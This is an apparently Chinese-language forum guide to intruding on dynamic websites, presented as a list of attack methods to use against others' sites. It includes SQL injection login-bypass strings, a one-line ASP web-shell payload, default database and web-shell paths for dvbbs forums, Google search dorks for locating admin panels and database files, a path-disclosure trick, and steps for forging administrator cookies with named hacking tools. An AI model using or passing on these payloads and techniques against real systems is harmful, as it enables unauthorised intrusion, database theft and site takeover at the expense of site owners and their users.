首先,觀察指定網站。
入侵指定網站是需要條件的:
要先觀察這個網站是動態還是靜態的。
首先介紹下什么樣站點可以入侵:我認為必須是動態的網站如ASP、PHP、JSP等代碼編寫的站點如果是靜態的(.htm或html),一般是不會成功的。
如果要入侵的目標網站是動態的,就可以利用動態網站的漏洞進行入侵。
Quote:
以下是入侵網站常用方法:
1.上傳漏洞
如果看到:選擇你要上傳的文件 [重新上傳]或者出現“請登陸后使用”,80%就有漏洞了!
有時上傳不一定會成功,這是因為Cookies不一樣.我們就要用WSockExpert取得Cookies.再用DOMAIN上傳.
2.注入漏洞
字符過濾不嚴造成的
3.暴庫:把二級目錄中間的/換成%5c
4.'or'='or'這是一個可以連接SQL的語名句.可以直接進入后臺。
我收集了一下。類似的還有:
'or''='
" or "a"="a
') or ('a'='a
") or ("a"="a
or 1=1--
' or 'a'='a
5.社會工程學。這個我們都知道吧。就是猜解。
6.寫入 ASP 格式數據庫。就是一句話木馬〈%execute request("value")%〉 (數據庫必需得是 ASP 或 ASA
的后綴)
7.源碼利用:一些網站用的都是網上下載的源碼.有的站長很懶.什么也不改.
比如:默認數據庫,默認后臺地址,默認管理員帳號密碼等
8.默認數據庫/webshell 路徑利用:這樣的網站很多/利人別人的 WEBSHELL.
/Databackup/dvbbs7.MDB
/bbs/Databackup/dvbbs7.MDB
/bbs/Data/dvbbs7.MDB
/data/dvbbs7.mdb
/bbs/diy.asp
/diy.asp
/bbs/cmd.asp
/bbs/cmd.exe
/bbs/s-u.exe
/bbs/servu.exe
工具:網站獵手 挖掘雞 明小子
9.查看目錄法:一些網站可以斷開目錄,可以訪問目錄。
210.37.95.65 images
10.工具溢出
11.搜索引擎利用:
inurl:flasher_list.asp
默認數據庫:database/flash.mdb
后臺/manager/
找網站的管理后臺地址:
site:xxxx.comintext:管理
site:xxxx.comintitle:管理 〈關鍵字很多,自已找〉
site:xxxx.cominurl:login
查找 access 的數據庫,mssql、mysql 的連接文件
allinurl:bbsdata
filetype:mdbinurl:database
filetype:incconn
inurl:datafiletype:mdb
12.COOKIE 詐騙:把自己的 ID 修改成管理員的,MD5 密碼也修改成他的,用桂林老兵工具可以修改 COOKIE。
13.利用常見的漏洞:如動網 BBS
可以先用:dvbbs 權限提升工具,使自已成為前臺管理員。
THEN,運用:動網固頂貼工具,找個固頂貼,再取得 COOKIES,這個要你自已做。我們可以用 WSockExpert
取得 Cookies/NC 包 這個我就不做了,網上教程多的是,自已下個看看。
工具:dvbbs 權限提升工具 動網固頂貼工具
14.還有一些老漏洞。如 IIS3,4 的查看源碼,
5 的 Delete CGI,PHP 的一些老洞,我就不說了啊。。太老了。沒有什么大用途。
